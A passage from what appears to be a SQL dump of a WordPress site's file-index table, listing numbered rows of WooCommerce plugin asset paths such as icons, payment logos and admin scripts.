vg'),(7087,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/gridicons-chevron-down.svg','wp-content/plugins/woocommerce/assets/images/icons/gridicons-chevron-down.svg'),(7088,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/info.svg','wp-content/plugins/woocommerce/assets/images/icons/info.svg'),(7089,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/loader.svg','wp-content/plugins/woocommerce/assets/images/icons/loader.svg'),(7090,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/star-golden.svg','wp-content/plugins/woocommerce/assets/images/icons/star-golden.svg'),(7091,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/star-gray.svg','wp-content/plugins/woocommerce/assets/images/icons/star-gray.svg'),(7092,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/icons/star-half-filled.svg','wp-content/plugins/woocommerce/assets/images/icons/star-half-filled.svg'),(7093,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/klarna-black.png','wp-content/plugins/woocommerce/assets/images/klarna-black.png'),(7094,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/amazon-ebay.svg','wp-content/plugins/woocommerce/assets/images/marketing/amazon-ebay.svg'),(7095,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/automatewoo.svg','wp-content/plugins/woocommerce/assets/images/marketing/automatewoo.svg'),(7096,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/creative-mail-by-constant-contact.png','wp-content/plugins/woocommerce/assets/images/marketing/creative-mail-by-constant-contact.png'),(7097,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/facebook.svg','wp-content/plugins/woocommerce/assets/images/marketing/facebook.svg'),(7098,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/google.svg','wp-content/plugins/woocommerce/assets/images/marketing/google.svg'),(7099,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/hubspot.svg','wp-content/plugins/woocommerce/assets/images/marketing/hubspot.svg'),(7100,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/jetpack-crm.svg','wp-content/plugins/woocommerce/assets/images/marketing/jetpack-crm.svg'),(7101,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/klaviyo.png','wp-content/plugins/woocommerce/assets/images/marketing/klaviyo.png'),(7102,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/mailchimp.svg','wp-content/plugins/woocommerce/assets/images/marketing/mailchimp.svg'),(7103,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/mailpoet.svg','wp-content/plugins/woocommerce/assets/images/marketing/mailpoet.svg'),(7104,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/pinterest.svg','wp-content/plugins/woocommerce/assets/images/marketing/pinterest.svg'),(7105,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/salesforce.jpg','wp-content/plugins/woocommerce/assets/images/marketing/salesforce.jpg'),(7106,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/tiktok.jpg','wp-content/plugins/woocommerce/assets/images/marketing/tiktok.jpg'),(7107,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/trustpilot.png','wp-content/plugins/woocommerce/assets/images/marketing/trustpilot.png'),(7108,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/vimeo.png','wp-content/plugins/woocommerce/assets/images/marketing/vimeo.png'),(7109,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketing/zapier.png','wp-content/plugins/woocommerce/assets/images/marketing/zapier.png'),(7110,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/marketplace-header-bg@2x.png','wp-content/plugins/woocommerce/assets/images/marketplace-header-bg@2x.png'),(7111,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/mercadopago.png','wp-content/plugins/woocommerce/assets/images/mercadopago.png'),(7112,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/bacs.svg','wp-content/plugins/woocommerce/assets/images/onboarding/bacs.svg'),(7113,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/cod.svg','wp-content/plugins/woocommerce/assets/images/onboarding/cod.svg'),(7114,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/codistoconnect.png','wp-content/plugins/woocommerce/assets/images/onboarding/codistoconnect.png'),(7115,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/creative-mail-by-constant-contact.png','wp-content/plugins/woocommerce/assets/images/onboarding/creative-mail-by-constant-contact.png'),(7116,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/creativemail.png','wp-content/plugins/woocommerce/assets/images/onboarding/creativemail.png'),(7117,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/eway.png','wp-content/plugins/woocommerce/assets/images/onboarding/eway.png'),(7118,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/facebook.png','wp-content/plugins/woocommerce/assets/images/onboarding/facebook.png'),(7119,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/fb-woocommerce.png','wp-content/plugins/woocommerce/assets/images/onboarding/fb-woocommerce.png'),(7120,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/g-shopping.png','wp-content/plugins/woocommerce/assets/images/onboarding/g-shopping.png'),(7121,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/google.svg','wp-content/plugins/woocommerce/assets/images/onboarding/google.svg'),(7122,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/jetpack.svg','wp-content/plugins/woocommerce/assets/images/onboarding/jetpack.svg'),(7123,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/klaviyo.png','wp-content/plugins/woocommerce/assets/images/onboarding/klaviyo.png'),(7124,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/mailchimp-for-woocommerce.png','wp-content/plugins/woocommerce/assets/images/onboarding/mailchimp-for-woocommerce.png'),(7125,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/mailchimp.png','wp-content/plugins/woocommerce/assets/images/onboarding/mailchimp.png'),(7126,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/mailpoet.png','wp-content/plugins/woocommerce/assets/images/onboarding/mailpoet.png'),(7127,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/mercadopago.png','wp-content/plugins/woocommerce/assets/images/onboarding/mercadopago.png'),(7128,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/mollie.svg','wp-content/plugins/woocommerce/assets/images/onboarding/mollie.svg'),(7129,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/other-small.jpg','wp-content/plugins/woocommerce/assets/images/onboarding/other-small.jpg'),(7130,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/payoneer.png','wp-content/plugins/woocommerce/assets/images/onboarding/payoneer.png'),(7131,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/paystack.png','wp-content/plugins/woocommerce/assets/images/onboarding/paystack.png'),(7132,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/payu.svg','wp-content/plugins/woocommerce/assets/images/onboarding/payu.svg'),(7133,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/pinterest.png','wp-content/plugins/woocommerce/assets/images/onboarding/pinterest.png'),(7134,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/razorpay.svg','wp-content/plugins/woocommerce/assets/images/onboarding/razorpay.svg'),(7135,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/tiktok.svg','wp-content/plugins/woocommerce/assets/images/onboarding/tiktok.svg'),(7136,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/wcpay.svg','wp-content/plugins/woocommerce/assets/images/onboarding/wcpay.svg'),(7137,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/woo.svg','wp-content/plugins/woocommerce/assets/images/onboarding/woo.svg'),(7138,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/onboarding/zipco.png','wp-content/plugins/woocommerce/assets/images/onboarding/zipco.png'),(7139,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payfast.png','wp-content/plugins/woocommerce/assets/images/payfast.png'),(7140,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/affirm.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/affirm.png'),(7141,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/afterpay.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/afterpay.png'),(7142,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/amazonpay.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/amazonpay.png'),(7143,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/bacs.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/bacs.png'),(7144,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/cod.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/cod.png'),(7145,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/eway.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/eway.png'),(7146,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/klarna.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/klarna.png'),(7147,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/mercadopago.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/mercadopago.png'),(7148,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/mollie.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/mollie.png'),(7149,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/payfast.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/payfast.png'),(7150,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/payoneer.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/payoneer.png'),(7151,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/paypal.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/paypal.png'),(7152,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/paystack.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/paystack.png'),(7153,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/payu.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/payu.png'),(7154,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/razorpay.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/razorpay.png'),(7155,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/square.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/square.png'),(7156,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/stripe.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/stripe.png'),(7157,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/zipco.png','wp-content/plugins/woocommerce/assets/images/payment_methods/72x72/zipco.png'),(7158,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/paypal-braintree.png','wp-content/plugins/woocommerce/assets/images/paypal-braintree.png'),(7159,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/paypal.png','wp-content/plugins/woocommerce/assets/images/paypal.png'),(7160,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/placeholder-attachment.png','wp-content/plugins/woocommerce/assets/images/placeholder-attachment.png'),(7161,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/placeholder.png','wp-content/plugins/woocommerce/assets/images/placeholder.png'),(7162,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/product_data/no-variation-arrow.svg','wp-content/plugins/woocommerce/assets/images/product_data/no-variation-arrow.svg'),(7163,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/product_data/no-variation-background-image.svg','wp-content/plugins/woocommerce/assets/images/product_data/no-variation-background-image.svg'),(7164,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/select2-spinner.gif','wp-content/plugins/woocommerce/assets/images/select2-spinner.gif'),(7165,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/select2.png','wp-content/plugins/woocommerce/assets/images/select2.png'),(7166,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/select2x2.png','wp-content/plugins/woocommerce/assets/images/select2x2.png'),(7167,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/check.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/check.svg'),(7168,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/discount.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/discount.svg'),(7169,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/envia-column.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/envia-column.svg'),(7170,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/packlink-column.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/packlink-column.svg'),(7171,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/packlink-row.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/packlink-row.svg'),(7172,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/paper.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/paper.svg'),(7173,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/printer.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/printer.svg'),(7174,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/sendcloud-column.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/sendcloud-column.svg'),(7175,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/sendcloud-row.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/sendcloud-row.svg'),(7176,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/shipstation-column.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/shipstation-column.svg'),(7177,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/shipstation-row.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/shipstation-row.svg'),(7178,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/skydropx-column.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/skydropx-column.svg'),(7179,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/star.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/star.svg'),(7180,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/timer.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/timer.svg'),(7181,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shipping_partners/wcs-column.svg','wp-content/plugins/woocommerce/assets/images/shipping_partners/wcs-column.svg'),(7182,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/shippingillustration.svg','wp-content/plugins/woocommerce/assets/images/shippingillustration.svg'),(7183,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/square-black.png','wp-content/plugins/woocommerce/assets/images/square-black.png'),(7184,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/stripe.png','wp-content/plugins/woocommerce/assets/images/stripe.png'),(7185,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/task_list/basics-section-illustration.png','wp-content/plugins/woocommerce/assets/images/task_list/basics-section-illustration.png'),(7186,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/task_list/customize-store-illustration.svg','wp-content/plugins/woocommerce/assets/images/task_list/customize-store-illustration.svg'),(7187,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/task_list/expand-section-illustration.png','wp-content/plugins/woocommerce/assets/images/task_list/expand-section-illustration.png'),(7188,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/task_list/payment-illustration.png','wp-content/plugins/woocommerce/assets/images/task_list/payment-illustration.png'),(7189,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/task_list/purchase-illustration.png','wp-content/plugins/woocommerce/assets/images/task_list/purchase-illustration.png'),(7190,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/task_list/sales-illustration.png','wp-content/plugins/woocommerce/assets/images/task_list/sales-illustration.png'),(7191,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/task_list/sales-section-illustration.png','wp-content/plugins/woocommerce/assets/images/task_list/sales-section-illustration.png'),(7192,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/task_list/shipping-illustration.png','wp-content/plugins/woocommerce/assets/images/task_list/shipping-illustration.png'),(7193,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/task_list/store-details-illustration.png','wp-content/plugins/woocommerce/assets/images/task_list/store-details-illustration.png'),(7194,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/task_list/tax-illustration.png','wp-content/plugins/woocommerce/assets/images/task_list/tax-illustration.png'),(7195,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/wcpayments-icon-secure.png','wp-content/plugins/woocommerce/assets/images/wcpayments-icon-secure.png'),(7196,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/woocommerce_logo.png','wp-content/plugins/woocommerce/assets/images/woocommerce_logo.png'),(7197,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/woocommerce_logo.svg','wp-content/plugins/woocommerce/assets/images/woocommerce_logo.svg'),(7198,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/wpspin-2x.gif','wp-content/plugins/woocommerce/assets/images/wpspin-2x.gif'),(7199,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/images/wpspin.gif','wp-content/plugins/woocommerce/assets/images/wpspin.gif'),(7200,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/accounting/accounting.js','wp-content/plugins/woocommerce/assets/js/accounting/accounting.js'),(7201,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js','wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js'),(7202,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/api-keys.js','wp-content/plugins/woocommerce/assets/js/admin/api-keys.js'),(7203,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/api-keys.min.js','wp-content/plugins/woocommerce/assets/js/admin/api-keys.min.js'),(7204,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/backbone-modal.js','wp-content/plugins/woocommerce/assets/js/admin/backbone-modal.js'),(7205,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/backbone-modal.min.js','wp-content/plugins/woocommerce/assets/js/admin/backbone-modal.min.js'),(7206,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/marketplace-suggestions.js','wp-content/plugins/woocommerce/assets/js/admin/marketplace-suggestions.js'),(7207,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/marketplace-suggestions.min.js','wp-content/plugins/woocommerce/assets/js/admin/marketplace-suggestions.min.js'),(7208,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-coupon.js','wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-coupon.js'),(7209,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-coupon.min.js','wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-coupon.min.js'),(7210,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-order.js','wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-order.js'),(7211,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-order.min.js','wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-order.min.js'),(7212,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-product-variation.js','wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-product-variation.js'),(7213,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-product-variation.min.js','wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-product-variation.min.js'),(7214,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-product.js','wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-product.js'),(7215,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-product.min.js','wp-content/plugins/woocommerce/assets/js/admin/meta-boxes-product.min.js'),(7216,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/meta-boxes.js','wp-content/plugins/woocommerce/assets/js/admin/meta-boxes.js'),(7217,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/meta-boxes.min.js','wp-content/plugins/woocommerce/assets/js/admin/meta-boxes.min.js'),(7218,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/network-orders.js','wp-content/plugins/woocommerce/assets/js/admin/network-orders.js'),(7219,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/network-orders.min.js','wp-content/plugins/woocommerce/assets/js/admin/network-orders.min.js'),(7220,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/product-editor.js','wp-content/plugins/woocommerce/assets/js/admin/product-editor.js'),(7221,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/product-editor.min.js','wp-content/plugins/woocommerce/assets/js/admin/product-editor.min.js'),(7222,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/product-ordering.js','wp-content/plugins/woocommerce/assets/js/admin/product-ordering.js'),(7223,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/product-ordering.min.js','wp-content/plugins/woocommerce/assets/js/admin/product-ordering.min.js'),(7224,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/quick-edit.js','wp-content/plugins/woocommerce/assets/js/admin/quick-edit.js'),(7225,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/quick-edit.min.js','wp-content/plugins/woocommerce/assets/js/admin/quick-edit.min.js'),(7226,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/reports.js','wp-content/plugins/woocommerce/assets/js/admin/reports.js'),(7227,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/reports.min.js','wp-content/plugins/woocommerce/assets/js/admin/reports.min.js'),(7228,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/settings-views-html-settings-tax.js','wp-content/plugins/woocommerce/assets/js/admin/settings-views-html-settings-tax.js'),(7229,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/settings-views-html-settings-tax.min.js','wp-content/plugins/woocommerce/assets/js/admin/settings-views-html-settings-tax.min.js'),(7230,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/settings.js','wp-content/plugins/woocommerce/assets/js/admin/settings.js'),(7231,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/settings.min.js','wp-content/plugins/woocommerce/assets/js/admin/settings.min.js'),(7232,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/system-status.js','wp-content/plugins/woocommerce/assets/js/admin/system-status.js'),(7233,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/system-status.min.js','wp-content/plugins/woocommerce/assets/js/admin/system-status.min.js'),(7234,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/term-ordering.js','wp-content/plugins/woocommerce/assets/js/admin/term-ordering.js'),(7235,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/term-ordering.min.js','wp-content/plugins/woocommerce/assets/js/admin/term-ordering.min.js'),(7236,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/users.js','wp-content/plugins/woocommerce/assets/js/admin/users.js'),(7237,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/users.min.js','wp-content/plugins/woocommerce/assets/js/admin/users.min.js'),(7238,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-admin-menu.js','wp-content/plugins/woocommerce/assets/js/admin/wc-admin-menu.js'),(7239,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-admin-menu.min.js','wp-content/plugins/woocommerce/assets/js/admin/wc-admin-menu.min.js'),(7240,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-clipboard.js','wp-content/plugins/woocommerce/assets/js/admin/wc-clipboard.js'),(7241,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-clipboard.min.js','wp-content/plugins/woocommerce/assets/js/admin/wc-clipboard.min.js'),(7242,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-enhanced-select.js','wp-content/plugins/woocommerce/assets/js/admin/wc-enhanced-select.js'),(7243,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-enhanced-select.min.js','wp-content/plugins/woocommerce/assets/js/admin/wc-enhanced-select.min.js'),(7244,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-orders.js','wp-content/plugins/woocommerce/assets/js/admin/wc-orders.js'),(7245,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-orders.min.js','wp-content/plugins/woocommerce/assets/js/admin/wc-orders.min.js'),(7246,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-product-export.js','wp-content/plugins/woocommerce/assets/js/admin/wc-product-export.js'),(7247,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-product-export.min.js','wp-content/plugins/woocommerce/assets/js/admin/wc-product-export.min.js'),(7248,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-product-import.js','wp-content/plugins/woocommerce/assets/js/admin/wc-product-import.js'),(7249,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-product-import.min.js','wp-content/plugins/woocommerce/assets/js/admin/wc-product-import.min.js'),(7250,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-setup.js','wp-content/plugins/woocommerce/assets/js/admin/wc-setup.js'),(7251,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/assets/js/admin/wc-